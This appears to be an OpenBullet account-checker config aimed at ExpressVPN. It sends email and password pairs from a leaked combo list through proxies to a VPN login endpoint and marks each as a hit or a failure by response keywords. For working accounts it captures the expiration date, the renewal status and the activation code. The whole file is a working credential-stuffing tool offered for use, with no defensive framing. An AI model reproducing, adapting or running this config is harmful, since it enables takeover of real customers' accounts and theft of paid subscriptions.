[SETTINGS]
{
  "Name": "ExpressVPN",
  "SuggestedBots": 1,
  "LastModified": "2019-04-07T16:17:59.0097048+07:00",
  "AdditionalInfo": "",
  "Author": "Masterz",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://www.jfciocb.net/vpn_servers?email=<USER>&password=<PASS>" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "authentication failed" 
    KEY "Payment Verification Needed" 
  KEYCHAIN Success OR 
    KEY "<subscription>" 
PARSE "<SOURCE>" LR "{\"name\":\"exp\",\"value\":\"<expiration_date>" "<" Recursive=FALSE -> CAP "expiration:" "" "" 
PARSE "<SOURCE>" LR "\"name\":\"autoRenew\",\"value\":\"<billing_cycle>" "<" Recursive=FALSE -> CAP "autoRenewal:" "" "" 
PARSE "<SOURCE>" LR "\"name\":\"code\",\"value\":\"<long_activation_code>" "<" Recursive=FALSE -> CAP "activationCode:" "" "" 
